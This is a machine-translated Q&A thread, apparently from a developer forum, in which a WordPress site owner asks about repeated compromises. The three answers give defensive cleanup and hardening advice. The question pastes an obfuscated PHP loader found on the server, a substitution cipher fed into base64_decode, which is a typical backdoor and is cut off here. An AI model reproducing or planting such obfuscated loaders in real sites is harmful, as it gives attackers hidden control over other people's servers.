我负责Wordpress网站。 1年前,该网站遭到黑客入侵。当有人通过输入网址在网站上连接时,他被重定向到另一个"假的"现场。我发现一行只是在index.php中重定向到另一个站点。我删除了线路并恢复了我的ftp服务器。在此之前,我注意到ftp服务器上有一些可疑文件,我没有创建这些文件,并且有一些模糊的php和js代码,带有一些随机字符。
最近该网站遇到了同样的问题,除非我们在网站上连接时只有一个空白页面。我又恢复了网站。在此之前我注意到ftp服务器上有一些可疑文件,我没有创建这些文件,并且里面有一些模糊的php和js代码,带有一些随机字符。
所有文件的生存日期几乎相同,我无权从服务器中删除它们。我认为漏洞来自这里,但我无法在互联网上找到任何类似的案例。有人有关于它的信息吗?我只是想知道一些信息,而且目前我无法访问该网站。
编辑:
我有这样的档案:
<?php
$vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');
function v9PSABL($vMCS1QU, $vDG7FSU){$v4ZU9QC = ''; for($i=0; $i < strlen($vMCS1QU); $i++){$v4ZU9QC .= isset($vDG7FSU[$vMCS1QU[$i]]) ? $vDG7FSU[$vMCS1QU[$i]] : $vMCS1QU[$i];}
return base64_decode($v4ZU9QC);}
$vW073GA = 'DnrxDKVfcKPxi5g9ekinekTyuPyI1SddKGV53sc53s4J3LWPKGV59Lr'.
'JKYUgT1TOT04S1SddKGV53sc53s4J3dkV9Ge5Km5Le5TJKYUgT1T2N0MoN1hbv0LQRbxiDn'.
'rxTnkXMteAu1eE3mkYkdkYn8lTk5ePKGWEedgYkm5YeLkLKmc63QlluYdu1K4u1PddKGV53sc53s4JY5'.
'e335grKmc63slz3de5e5gB9GTJKYUgT1T2N0MoN1hbv0LQRbxiEPyg1SyycQWyMaVsl1SdKmci9Lk9uYduCbxicHg8cn50D1S'.
'dKmci9Lk9TB5fT1ewcKdS69hSiBcypB3y1SsI1SdiDnrxTKVmMJzOM8SdcHs4ck4JpH5XcYllv1UQvHybc8TyuPxi1K4u1PdiiBc'.
'ypBkornGsTjmSrn2mcKiEpn50MHgfu1eHDn2sn8lornGsiGmyRbxi1PddcHs4cnAWpn3S6YzolnGEpn50MHgfu1eHDn2spH5XcYd'.
'I1Sdi1YeHDn2spH5XcYUgTtWolnGEpn50MHgfu1eHDn2spH5XcYdI1Sdi1YeEedsNekVp'.
'iBXsCkGpTHAWpn3QKYUgT1eHDn2spH5Xc94u1Psg1Ssg1Jmu1PyHlnA0lBsOpQz0lKVmp'.
'FGEMae8DKzElB5JM8SdlBkhl1duCbxST1USitesCtPS6YzfltiyM5gmrnlfu1'.
'emcKWmv1UJ6BL+i8dI1SxST1USitesCtPS6YzfltiEMHkbpB50cYSQ6BLSDtisc0GMTQT4T1ipT1T4T1emcKWmu94uT1UST1e'.
'mcKWmTjmSMae8KaisMB2WrF3xT0bOr9hQv1UQTQbSitesCtPyRbxST1USitesCtPS6Yzflti'.
'EMHkbpB50cYSQK1T+TQbSTQzlT1T4T1emcKWmu94u1QUST1z8cKeGMHhSi'.
'tesCtPI1Jmu1HcGpHVmDngoTBsfKFsbu1efltTyTt4uT1z8cKeGMHhSMtiscGgXrKe0D1S'.
'QvGhxnfLXRkGqnfLXRkGpN1mAKKb2nfUXRkGpN1mAKKb8nfUXV5GpN1'.
'mAKKb8Vk4bv9kluYWMvQWpN1mAKK2pNYmAKk4bv9slEj5pN1mAKk4bv9slEjipN1mmKk4bv9slEjTGnf'.
'UXVkmyuK4fEYPOTQbdMae8u94uEPxucJkoraeypFhScJiOpkgxpaVmu1e0pFAmcnAmuPyI1SxST1USi'.
'BWOMaPS6YzbMHkJKaisMB2WrF3xi8gCutlala2HltUyK1hODYM4i8'.
'M4P1eE3mkYkdkYn8lTk5ePKmW63GPJKYdI1SxST1USDnrSuBsfKFsbu1expaVmuYduT1UST'.
't4uT1UST1UST1z8cKeGMHhSiBVOpJespJPI1QUST1zg1QUST1UuT1UST1empFXspJNS6YzsCtz4pFesu1iUTQbSiBVOpJespJPy'.
'RbxuT1UST1e0pFAmcnAmTjmSiteODFkoMG4bKYUoT1iUTQUoT1exp'.
'aVmT1hST0hQRbxuT1USTtisltk8pQUdrFgolBkolj4uEPxucJkoraeypFhSrn2mcKiEpn50MHgfu1e0pFAmcn'.
'AmuPyI1QUST1zbMHkJKFGWlBVxKF54p1SJTa4xvQxyEYVkDYM4T1e0pFAmcnAmv1Udpn5mr'.
'FWsM8dI1SxST1UScHg8u1eyTjmSNj4SiBdS61z0pakol1Sdpn5mrFWsMG'.
'42KYdIT1eyu84y1QUST1zI1SxST1UST1UST1eoM8UgTBkhMB2OcB3xTJbQv1Udpn5mrF'.
'WsMG42Kk4dDkmyRbxST1UST1UST1e0NQUgTBVOlnAmu1eoM8dI'.
'1QUST1UST1USitiWpHPS6Yz8rnAdujU4T1SdrfTSvYU2uYdI1QUST1UST1USiBVOpJespJPS6Yz'.
'fltiEMHkbpB50cYSQC8ToiBGWlBVxcKVpNkGpiBslvQigTQbSiBAfn8'.
有人知道它是什么吗?
答案 0 :(得分:1)
这非常广泛。在网站上有数百万可能的攻击媒介。你受到攻击的事实本身并没有暗示任何其他任何一种可能性。
由于您在攻击发生时有时间戳,因此请检查当时的服务器日志,以获取有关该向量的线索。当时是否有SFTP访问权限?合法用户的密码可能会受到损害。那时是否有HTTP访问权限?也许插件存在漏洞,需要禁用或升级。
攻击者只需要一个漏洞即可访问该网站。它可能是显而易见的(例如,如果你看到来自已知用户帐户的SFTP活动),或者可能需要进行广泛的研究来弄清楚发生了什么以及如何发生。
答案 1 :(得分:1)
这很简单:你被黑了。
忘记尝试对php文件进行反混淆处理;他们可能会告诉你文件的作用,但他们不会告诉你文件是如何的。全部删除。
除非您仔细解析服务器日志并检查所有插件和主题是否存在漏洞,否则您将无法找到漏洞利用向量。而这个载体可能是你自己的PC / mac上的恶意软件,它会窃取凭据。
修复很简单:按照FAQ My site was hacked - WordPress Codex.扫描您自己的PC / Mac以及用于访问WordPress管理员和托管帐户的任何计算机,仔细清理网站和托管帐户。
如果这是您自己的服务器,您也需要强化它。尝试搜索https://serverfault.com/以获取有关您的操作系统的信息以及如何保护和加固它。
在Hardening WordPress - WordPress Codex和Brute Force Attacks - WordPress Codex
中查看建议的WordPress安全措施答案 2 :(得分:0)
当您说您无权删除它们时,您不是在管理网站吗?如果您没有完全的管理权限,您应该与任何人联系并解释情况,以便他们可以立即处理,或者至少使您能够这样做。
你知道这个网站第一次和第二次被黑了吗?显然存在需要解决的漏洞。
留下了什么样的文件?您是否可以检查/解释内容,而不是查找“模糊”代码?